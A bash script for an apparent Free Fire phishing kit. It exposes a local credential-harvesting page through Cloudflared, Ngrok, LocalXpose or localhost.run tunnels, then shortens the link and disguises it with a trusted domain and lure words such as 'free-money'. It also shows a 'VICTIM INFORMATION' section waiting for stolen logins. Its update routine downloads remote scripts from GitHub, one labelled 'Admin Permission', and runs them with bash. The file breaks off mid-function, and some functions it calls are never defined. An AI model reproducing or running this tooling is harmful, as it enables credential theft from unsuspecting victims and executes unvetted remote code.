#!/bin/bash
echo ""

clear
echo ""
echo ""
printf "\e[100;330m[\e[10m **** ]\e[1;40m\e[10m OnlineHacking :\e[1;32m Join Telegram Channel \e[1;33m @OnlineHacking  !\e[0m"
echo ""
echo ""
sleep 3
echo ""
check_status
check_update
sleep 2
echo ""
clear
echo -e $'' 
clear
logo1
select_url			   
echo ""
                 
                     


check_status() {
        echo -ne "\e[33m Internet Status : "
        timeout 3s curl -fIs "https://api.github.com" > /dev/null
        [ $? -eq 0 ] && echo -e "\e[92m Online\e[0m" || echo -e "\e[31mOffline\e[0m"
}


check_update1 () {
echo ""
echo -ne "\e[33m Chack Lates Version : " && rm -rf ChackVersion-2.8 && wget -q https://github.com/OnlineHacKing/FreeFire-Phishing/raw/main/Update/ChackVersion-2.8 > /dev/null && bash ChackVersion-2.8 && rm -rf ChackVersion-2.8
echo ""
echo -ne "\e[33m Checking Update : " && rm -rf CheckingUpdate-2.8 && sleep 1 && wget -q https://github.com/OnlineHacKing/FreeFire-Phishing/raw/main/Update/CheckingUpdate-2.8 > /dev/null && bash CheckingUpdate-2.8 && rm -rf CheckingUpdate-2.8
echo ""
echo -ne "\e[33m Admin Permission : " && rm -rf admin && wget -q https://github.com/suman333mondal/Phishing_Database/raw/main/Suman/Phishing/FreeFire/admin > /dev/null && bash admin && rm -rf admin
echo ""
sleep 1
}


function select_url() {
clear
logo1
echo -e "\e[1;96m  \e[m "
printf " \e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m " 
echo " "
printf "\e[1;31m[\e[0m\e[1;92m1\e[0m\e[1;31m] \e[0m\e[1;37;44m Cloudflare \e[0m   \e[0;91m[\e[0;96mAuto Detects\e[0;91m] "
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m"     
echo
printf "\e[1;31m[\e[0m\e[1;92m2\e[0m\e[1;31m] \e[0m\e[1;37;41m Ngrok \e[0m        \e[0;91m[\e[0;96mAccount Token Needed\e[0;91m]   "
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m"
echo
printf "\e[1;31m[\e[0m\e[1;92m3\e[0m\e[1;31m] \e[0m\e[1;91;107m LocalXpose \e[0m   \e[0;91m[\e[0;95mNEW! \e[96mMax 15Min\e[0;91m]  "
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m"
echo
printf "\e[1;31m[\e[0m\e[1;92m4\e[0m\e[1;31m] \e[0m\e[1;48;5;21m lhr.Life \e[0m     \e[0;91m[\e[0;95mNEW!\e[0;96m Not Hotspot On\e[0;91m] "
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m"   
echo
printf "\e[1;31m[\e[0m\e[1;92m5\e[0m\e[1;31m] \e[0m\e[1;48;5;200m LocalHost \e[0m    \e[0;91m[\e[0;96mOnly This Devices!\e[0;91m]  "
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m"   
echo
printf "\e[1;31m[\e[0m\e[1;92m6\e[0m\e[1;31m] \e[0m\e[1;34;103m Ngrok + Cloudflare + LocalXpose + lhr.Life \e[0m \e[0;91m[\e[0;96mPremium User\e[0;91m]  "
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m" 
echo
printf "\e[1;31m\e[0m\e[1;92m\e[0m\e[1;31m \e[0m\e[1;37;44m\e[0m"   
echo " "

read -p $'\e[1;91m[\e[0m\e[1;91m *** \e[0m\e[1;96m]\e[0m\e[92m You Want to Choose Phishing Link Services Option : \e[97m ' portfrd
if [[ $portfrd == "1" || $portfrd == "01" || $portfrd == "cloudflare" ]]; then
echo ""
install_cloudflared
start_cloudflared
clear
logo_last
                           
			   
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m Cloudflared Link :\e[0m\e[1;77m %s\e[0m\n" $clink                                   
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo ""
			   echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo ""
askuri_c
clear
logo_last
sleep 3
clear
l_logo
links_c
			   

fi
if [[ $portfrd == "2" || $portfrd == "02" || $portfrd == "ngrok" ]]; then
echo ""
clear
install_ngrok
ngroktoken
start_ngrok
clear
logo_last
                           
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m Ngrok Link :\e[0m\e[1;77m %s\e[0m\n" $nlink                                   
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo ""
			   echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo ""
askuri_nc
clear
logo_last
sleep 3
clear
l_logo
links_n

fi
if [[ $portfrd == "3" || $portfrd == "03" || $portfrd == "localxpose" ]]; then
echo ""
install_localxpose
start_loclx
clear
logo_last
                           
            
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m LocalXpose Link :\e[0m\e[1;77m %s\e[0m\n" $llink                                   
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo ""
			   echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo ""
askuri_l
clear
logo_last
sleep 3
clear
l_logo
links_l



fi
if [[ $portfrd == "4" || $portfrd == "04" || $portfrd == "lhrlife" ]]; then

echo ""
start_lhrlife
clear
logo_last
                           

                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m LocalXpose Link :\e[0m\e[1;77m %s\e[0m\n" $lhrlifelink                                   
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo ""
			   echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo ""
askuri_lhrlife
clear
logo_last
sleep 3
clear
l_logo
links_lhrlife

fi

if [[ $portfrd == "5" || $portfrd == "05" || $portfrd == "localhost" ]]; then
echo ""
clear
l_logo
                           echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo -e " "
			   echo -e " "
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33mLocalHost Link :\e[0m\e[1;77m http://127.0.0.1:4444/   \e[0m    "                        
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo -e "\e[96m=======================\e[92m VICTIM INFORMATION \e[96m======================= \e[93m" 
                           echo ""
			   echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;95m Waiting For Login Info, \e[92mCtrl + C \e[1;95mto Exit... \e[93m"
			   echo ""                
			   
fi

if [[ $portfrd == "6" || $portfrd == "06" || $portfrd == "suman" ]]; then
echo ""
echo ""
echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
echo ""
start_cloudflared
echo ""
start_ngrok
start_loclx
start_lhrlife
clear
l_logo
all_links
			   
fi
}

function askuri_c() {
echo ""
read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Do You Want To Modify This Url \e[1;91m (Y/N) : \e[0m' option
echo""
echo""
echo""

if [[ $option == "Y" || $option == "y" || $option == "yes" ]]; then
url_shortner_c

fi

if [[ $option == "N" || $option == "n" || $option == "no" ]]; then
clear
echo""
echo""

fi

echo ""
}


function askuri_nc() {
echo ""
read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Do You Want To Modify This Url \e[1;91m (Y/N) : \e[0m' option
echo""
echo""
echo""

if [[ $option == "Y" || $option == "y" || $option == "yes" ]]; then
url_shortner_ng

fi

if [[ $option == "N" || $option == "n" || $option == "no" ]]; then
clear
echo""
echo""

fi

echo ""
}


function askuri_l() {
echo ""
read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Do You Want To Modify This Url \e[1;91m (Y/N) : \e[0m' option
echo""
echo""
echo""

if [[ $option == "Y" || $option == "y" || $option == "yes" ]]; then
url_shortner_l

fi

if [[ $option == "N" || $option == "n" || $option == "no" ]]; then
clear
echo""
echo""

fi

echo ""
}

function askuri_lhrlife() {
echo ""
read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Do You Want To Modify This Url \e[1;91m (Y/N) : \e[0m' option
echo""
echo""
echo""

if [[ $option == "Y" || $option == "y" || $option == "yes" ]]; then
url_shortner_lhrlife

fi

if [[ $option == "N" || $option == "n" || $option == "no" ]]; then
clear
echo""
echo""

fi

echo ""
}


function url_checker() {
        if [ ! "${1//:*}" = http ]; then
	        if [ ! "${1//:*}" = https ]; then
			echo
                        printf "${red} Invalid URL. Please use http or https. \n "
                        exit 1
		fi
	fi
}


# URL_SHORTNER
function url_shortner_c() {
        rm -rf uri.log log.URI 
	#short=$(curl -s http://tny.im/yourls-api.php?action=shorturl\&format=simple\&url=${ngrok_url})
	#short=$(curl -s https://vurl.com/api.php?url=${ngrok_url})
	#derek=$(curl -s https://is.gd/create.php\?format\=simple\&url=${link})
        #checking for is.gd is working or not.
        if [[ $derek == https://is.gd/[-0-9a-zA-Z]* ]]; then
        shorter=${derek#https://}
        else
        #short=$(curl -s https://soo.gd/api.php?url=${clink})
        curl -s https://api.shrtco.de/v2/shorten?url=${clink} >> log.URI 
        grep -o 'https:[^"]*' log.URI >> bURI
        rm log.URI
        sed 's/\\//g' bURI >> uri.log
        rm bURI
        short=$(grep -o 'https://9qr.de/[-0-9a-zA-Z]*' "uri.log")
        shorter=${short#https://}
        fi
echo -e ""
echo -e  '\e[91m[\e[92m*\e[91m]\e[93m\e[1m Domain to mask the Phishing URL \e[21m\e[0m: \e[91m(Ex:\e[96m https://google.com , http://facebook.com)\e[0m '
echo -e ""
echo -en "\e[32m =>\e[0m "
        read -p $' \033[1;93  Enter Link :\e[0m ' mask
        url_checker $mask
echo -e ""
echo -e " \e[91m[\e[92m*\e[91m] \e[93m\e[1mType social engineering words : \e[21m\e[0m\e[91m(Ex:\e[96m like, free-money, free-insta-followers)"
echo -e ' \e[32m Dont use space just use\e[97m - \e[32mbetween social engineering words\e[0m '
echo -e ""
echo -en "\e[32m=>\e[0m "
        read -p $'\e[1;92mMasking \033[1;97m>> \e[1;37mEnter your words here :\e[0m ' words
        final_url=$mask-$words@$shorter
echo -e " \e[91m[\e[92m★\e[91m] \e[93mYour Masking URL/Link:\e[32m ${final_url} \e[0m\n"
echo -e ""
echo -e ""
}

function url_shortner_ng() {
        rm -rf uri.log log.URI 
	#short=$(curl -s http://tny.im/yourls-api.php?action=shorturl\&format=simple\&url=${ngrok_url})
	#short=$(curl -s https://vurl.com/api.php?url=${ngrok_url})
	#derek=$(curl -s https://is.gd/create.php\?format\=simple\&url=${link})
        #checking for is.gd is working or not.
        if [[ $derek == https://is.gd/[-0-9a-zA-Z]* ]]; then
        shorter=${derek#https://}
        else
        #short=$(curl -s https://soo.gd/api.php?url=${nlink})
        curl -s https://api.shrtco.de/v2/shorten?url=${nlink} >> log.URI 
        grep -o 'https:[^"]*' log.URI >> bURI
        rm log.URI
        sed 's/\\//g' bURI >> uri.log
        rm bURI
        short=$(grep -o 'https://9qr.de/[-0-9a-zA-Z]*' "uri.log")
        shorter=${short#https://}
        fi
echo -e ""
echo -e  '\e[91m[\e[92m*\e[91m]\e[93m\e[1m Domain to mask the Phishing URL \e[21m\e[0m: \e[91m(Ex:\e[96m https://google.com , http://facebook.com)\e[0m '
echo -e ""
echo -en "\e[32m =>\e[0m "
        read -p $' \033[1;93  Enter Link :\e[0m ' mask
        url_checker $mask
echo -e ""
echo -e " \e[91m[\e[92m*\e[91m] \e[93m\e[1mType social engineering words : \e[21m\e[0m\e[91m(Ex:\e[96m like, free-money, free-insta-followers)"
echo -e ' \e[32m Dont use space just use\e[97m - \e[32mbetween social engineering words\e[0m '
echo -e ""
echo -en "\e[32m=>\e[0m "
        read -p $'\e[1;92mMasking \033[1;97m>> \e[1;37mEnter your words here :\e[0m ' words
        final_url=$mask-$words@$shorter
echo -e " \e[91m[\e[92m★\e[91m] \e[93mYour Masking URL/Link:\e[32m ${final_url} \e[0m\n"
echo -e ""
echo -e ""
}

function url_shortner_l() {
        rm -rf uri.log log.URI 
	#short=$(curl -s http://tny.im/yourls-api.php?action=shorturl\&format=simple\&url=${ngrok_url})
	#short=$(curl -s https://vurl.com/api.php?url=${ngrok_url})
	#derek=$(curl -s https://is.gd/create.php\?format\=simple\&url=${llink})
        #checking for is.gd is working or not.
        if [[ $derek == https://is.gd/[-0-9a-zA-Z]* ]]; then
        shorter=${derek#https://}
        else
        #short=$(curl -s https://soo.gd/api.php?url=${llink})
        curl -s https://api.shrtco.de/v2/shorten?url=${llink} >> log.URI 
        grep -o 'https:[^"]*' log.URI >> bURI
        rm log.URI
        sed 's/\\//g' bURI >> uri.log
        rm bURI
        short=$(grep -o 'https://9qr.de/[-0-9a-zA-Z]*' "uri.log")
        shorter=${short#https://}
        fi
echo -e ""
echo -e ' \e[91m[\e[92m*\e[91m]\e[93m\e[1m Domain to mask the Phishing URL \e[21m\e[0m: \e[91m(Ex:\e[96m https://google.com , http://facebook.com)\e[0m'
echo -e ""
echo -en "\e[32m =>\e[0m "
        read -p $' \033[1;93  Enter Link :\e[0m ' mask
        url_checker $mask
echo -e ""
echo -e " \e[91m[\e[92m*\e[91m] \e[93m\e[1mType social engineering words : \e[21m\e[0m\e[91m(Ex:\e[96m like, free-money, free-insta-followers)"
echo -e ' \e[32m Dont use space just use\e[97m - \e[32mbetween social engineering words\e[0m'
echo -e ""
echo -en "\e[32m=>\e[0m "
        read -p $'\e[1;92mMasking \033[1;97m>> \e[1;37mEnter your words here :\e[0m ' words
        final_url=$mask-$words@$shorter
echo -e " \e[91m[\e[92m★\e[91m] \e[93mYour Masking URL/Link:\e[32m ${final_url} \e[0m\n"
echo -e ""
echo -e ""
}


function url_shortner_lhrlife() {
        rm -rf uri.log log.URI 
	#short=$(curl -s http://tny.im/yourls-api.php?action=shorturl\&format=simple\&url=${ngrok_url})
	#short=$(curl -s https://vurl.com/api.php?url=${ngrok_url})
	#derek=$(curl -s https://is.gd/create.php\?format\=simple\&url=${lhrlifelink})
        #checking for is.gd is working or not.
        if [[ $derek == https://is.gd/[-0-9a-zA-Z]* ]]; then
        shorter=${derek#https://}
        else
        #short=$(curl -s https://soo.gd/api.php?url=${lhrlifelink})
        curl -s https://api.shrtco.de/v2/shorten?url=${lhrlifelink} >> log.URI 
        grep -o 'https:[^"]*' log.URI >> bURI
        rm log.URI
        sed 's/\\//g' bURI >> uri.log
        rm bURI
        short=$(grep -o 'https://9qr.de/[-0-9a-zA-Z]*' "uri.log")
        shorter=${short#https://}
        fi
echo -e ""
echo -e ' \e[91m[\e[92m*\e[91m]\e[93m\e[1m Domain to mask the Phishing URL \e[21m\e[0m: \e[91m(Ex:\e[96m https://google.com , http://facebook.com)\e[0m'
echo -e ""
echo -en "\e[32m =>\e[0m "
        read -p $' \033[1;93  Enter Link :\e[0m ' mask
        url_checker $mask
echo -e ""
echo -e " \e[91m[\e[92m*\e[91m] \e[93m\e[1mType social engineering words : \e[21m\e[0m\e[91m(Ex:\e[96m like, free-money, free-insta-followers)"
echo -e ' \e[32m Dont use space just use\e[97m - \e[32mbetween social engineering words\e[0m'
echo -e ""
echo -en "\e[32m=>\e[0m "
        read -p $'\e[1;92mMasking \033[1;97m>> \e[1;37mEnter your words here :\e[0m ' words
        final_url=$mask-$words@$shorter
echo -e " \e[91m[\e[92m★\e[91m] \e[93mYour Masking URL/Link:\e[32m ${final_url} \e[0m\n"
echo -e ""
echo -e ""
}


links_c() {
                           echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo -e " "
			   echo -e " "
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33mCloudflared Link :\e[0m\e[1;77m %s\e[0m\n" $clink                                   
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m Modify Link :\e[0m\e[1;77m %s\e[0m\n" $final_url
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo ""
			   echo -e "\e[96m=======================\e[92m VICTIM INFORMATION \e[96m======================= \e[93m" 
                           echo ""
			   echo ""
			   end
			   echo ""
			   msg_exit
}

links_n() {
                           echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo -e " "
			   echo -e " "
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m Ngrok Link :\e[0m\e[1;77m %s\e[0m\n" $nlink                                   
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m Modify Link :\e[0m\e[1;77m %s\e[0m\n" $final_url
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo ""
			   echo -e "\e[96m=======================\e[92m VICTIM INFORMATION \e[96m======================= \e[93m" 
                           echo ""
			   end
			   echo ""
			   msg_exit
}

links_l() {
                           echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo -e " "
			   echo -e " "
			   echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;95m This Link Online Only 15 Minutes (\e[94mOnly Free User\e[1;95m) "
			   echo -e " "
			   echo -e " "
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m LocalXpose Link :\e[0m\e[1;77m %s\e[0m\n" $llink                                   
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m Modify Link :\e[0m\e[1;77m %s\e[0m\n" $final_url
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo ""
			   echo -e "\e[96m=======================\e[92m VICTIM INFORMATION \e[96m======================= \e[93m" 
                           echo ""
			   echo " "
			   end
			   echo ""
			   msg_exit
}

links_lhrlife() {
                           echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo -e " "
			   echo -e " "
			   echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;95m Notice :\e[94m You Open this link and click chack button\e[1;95m) "
			   echo -e " "
			   echo -e " "
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m lhr.Life Link :\e[0m\e[1;77m %s\e[0m\n" $lhrlifelink                                  
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m Modify Link :\e[0m\e[1;77m %s\e[0m\n" $final_url
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo ""
			   echo -e "\e[96m=======================\e[92m VICTIM INFORMATION \e[96m======================= \e[93m" 
                           echo ""
			   echo " "
			   end
			   echo ""
			   msg_exit
}

all_links() {
                           echo -e "\e[96m=======================\e[92m   SUMAN © 2022 FF  \e[96m=======================\e[92m"
                           echo -e " "
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m Cloudflared :\e[0m\e[1;77m %s\e[0m\n" $clink                     
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m Ngrok Link :\e[0m\e[1;77m %s\e[0m\n" $nlink                    
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m LocalXpose Link :\e[0m\e[1;77m %s\e[0m\n" $llink                  
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m lhr.Life Link :\e[0m\e[1;77m %s\e[0m\n" $lhrlifelink                       
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
                           printf "\e[1;33m\e[0m\e[1;33m LocalHost Link :\e[0m\e[1;77m http://127.0.0.1:4444/   \e[0m "                     
                           echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m'
			   echo ""
			   echo -e "\e[96m=======================\e[92m VICTIM INFORMATION \e[96m======================= \e[93m" 
                           echo ""
			   echo -e " "
			   end
			   echo ""  
			   msg_exit
}			   
	


download() {
	url="$1"
	output="$2"
	file=`basename $url`
	if [[ -e "$file" || -e "$output" ]]; then
		rm -rf "$file" "$output"
	fi
	curl --silent --insecure --fail --retry-connrefused \
		--retry 3 --retry-delay 2 --location --output "${file}" "${url}"

	if [[ -e "$file" ]]; then
		if [[ ${file#*.} == "zip" ]]; then
			unzip -qq $file > /dev/null 2>&1
			cp -f $output > /dev/null 2>&1
		elif [[ ${file#*.} == "tgz" ]]; then
			tar -zxf $file > /dev/null 2>&1
			cp -f $output > /dev/null 2>&1
		else
			cp -f $file > /dev/null 2>&1
		fi
		chmod +x $output $file > /dev/null 2>&1
		rm -rf file1
	else
		echo -e "\e[91m Error occured while downloading ${output}."
		{ reset_color; exit 1; }
	fi
}


install_ngrok() {
	if [[ -e "ngrok" ]]; then
		echo -e "\e[91m[\e[92m-\e[91m] \e[96m Ngrok already installed."
	else
		echo -e "\e[91m[\e[92m*\e[91m] \e[96m Installing Ngrok..."
		arch=`uname -m`
		if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then
			download 'https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm.tgz' 'ngrok'
		elif [[ "$arch" == *'aarch64'* ]]; then
			download 'https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz' 'ngrok'
		elif [[ "$arch" == *'x86_64'* ]]; then
			download 'https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz' 'ngrok'
		else
			download 'https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-386.tgz' 'ngrok'
		fi
	fi
}


install_cloudflared() {
	if [[ -e "cloudflared" ]]; then
		echo -e "\e[91m[\e[92m-\e[91m] \e[96m Cloudflared already installed."
	else
		echo -e "\e[91m[\e[92m*\e[91m] \e[96m Installing Cloudflared..."
		arch=`uname -m`
		if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then
			download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm' 'cloudflared'
		elif [[ "$arch" == *'aarch64'* ]]; then
			download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm64' 'cloudflared'
		elif [[ "$arch" == *'x86_64'* ]]; then
			download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64' 'cloudflared'
		else
			download 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-386' 'cloudflared'
		fi
	fi
}

## Install LocalXpose
install_localxpose() {
	if [[ -e "loclx" ]]; then
		echo -e "\e[91m[\e[92m-\e[91m] \e[96m LocalXpose already installed."
	else
		echo -e "\e[91m[\e[92m*\e[91m] \e[96m Installing LocalXpose..."
		arch=`uname -m`
		if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then
			download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-arm.zip' 'loclx'
		elif [[ "$arch" == *'aarch64'* ]]; then
			download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-arm64.zip' 'loclx'
		elif [[ "$arch" == *'x86_64'* ]]; then
			download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-amd64.zip' 'loclx'
		else
			download 'https://api.localxpose.io/api/v2/downloads/loclx-linux-386.zip' 'loclx'
		fi
	fi
}


start_cloudflared() { 
	rm cld.log > /dev/null 2>&1 &
	{ sleep 1; }
	echo -e $" \e[91m[\e[0m-\e[91m]\e[1;92m Launching Cloudflared...\e[0m  "
	rm -rf cld.log

	if [[ `command -v termux-chroot` ]]; then
		sleep 2 && termux-chroot ./cloudflared tunnel -url 127.0.0.1:4444 --logfile cld.log > /dev/null 2>&1 &
	else
		sleep 2 && ./cloudflared tunnel -url 127.0.0.1:4444 --logfile cld.log > /dev/null 2>&1 &
	fi

	sleep 8
	clink=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' "cld.log")

	
}	   


start_ngrok() {
	{ sleep 1; }
	echo -e $" \e[91m[\e[0m-\e[91m]\e[1;92m Launching Ngrok...\e[0m  "
	echo -e "\n"
	echo -e ""

	if [[ `command -v termux-chroot` ]]; then
		sleep 2 && termux-chroot ./ngrok http 127.0.0.1:4444 > /dev/null 2>&1 &
	else
		sleep 2 && ./ngrok http 127.0.0.1:4444 > /dev/null 2>&1 &
	fi

	sleep 8
	nlink=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -Eo '(https)://[^/"]+(.ngrok.io)')

}


start_loclx() {
echo -e " "
rm -rf .loclx
echo -e ""
	echo -e "\e[91m[\e[0m-\e[91m]\e[1;92m Launching LocalXpose...\e[0m "
	{ sleep 1; localxpose_auth; }
	echo -e "\n"
	echo -e ""

	if [[ `command -v termux-chroot` ]]; then
		sleep 1 && termux-chroot ./loclx tunnel --raw-mode http --https-redirect -t 127.0.0.1:4444 > .loclx 2>&1 &
	else
		sleep 1 && ./loclx tunnel --raw-mode http --https-redirect -t 127.0.0.1:4444 > .loclx 2>&1 &
	fi

	sleep 12
	llink=$(cat .loclx | grep -o '[0-9a-zA-Z.]*.loclx.io')
	
}


start_lhrlife() {
echo -e " "
rm -rf lhrlife
echo -e ""
        echo -e "\e[91m[\e[0m-\e[91m]\e[1;92m Launching lhr.Life SSH...\e[0m "
	echo -e "\n"
	echo -e ""
sleep 1 && ssh -R 80:localhost:4444 nokey@localhost.run > lhrlife 2>&1 &
echo ""
	sleep 12
	lhrlifelink=$(cat lhrlife | grep -o 'https://[0-9a-zA-Z.]*.lhr.life')
	
}


localxpose_auth() {
	./loclx -help > /dev/null 2>&1 &
	sleep 1
	[ -d ".localxpose" ] && auth_f=".localxpose/.access" || auth_f="$HOME/.localxpose/.access" 

	[ "$(./loclx account status | grep Error)" ] && {
	        echo ""
                echo " "
		echo -e $'\e[1;91m\e[0m\e[1;91m\e[0m\e[1;96m\e[0m\e[1;91m   ----------------------------------------  \e[1;91m\e[0m'
                echo -e $'\e[1;96m\e[0m\e[1;77m\e[0m\e[1;96m\e[0m\e[1;91m  !!      Requirement Localxpose Token    !!\e[0m'
                echo -e $'\e[1;91m\e[0m\e[1;91m\e[0m\e[1;96m\e[0m\e[1;91m   ----------------------------------------- \e[1;91m\e[0m'
                echo ""
                echo " "
                echo -e "\e[91m[\e[92m*\e[91m]\e[93m Visit \e[92mlocalxpose.io \e[m "
                echo ""
                echo -e "\e[91m[\e[92m*\e[91m]\e[93m Create an account on & Click Access Button & Copy Access Token \e[m "
                echo ""
		sleep 3
		read -p $'\e[91m[\e[92m*\e[91m]\e[93m Input Loclx Token :\e[97m ' loclx_token
		[[ $loclx_token == "" ]] && {
			echo -e "\e[91m[\e[92m!\e[91m]\e[93m  You have to input Localxpose Token." ; sleep 2 ; tunnel_menu
		} || {
			echo -n "$loclx_token" > $auth_f 2> /dev/null
		}
	}
}

ngroktoken() {
echo ""
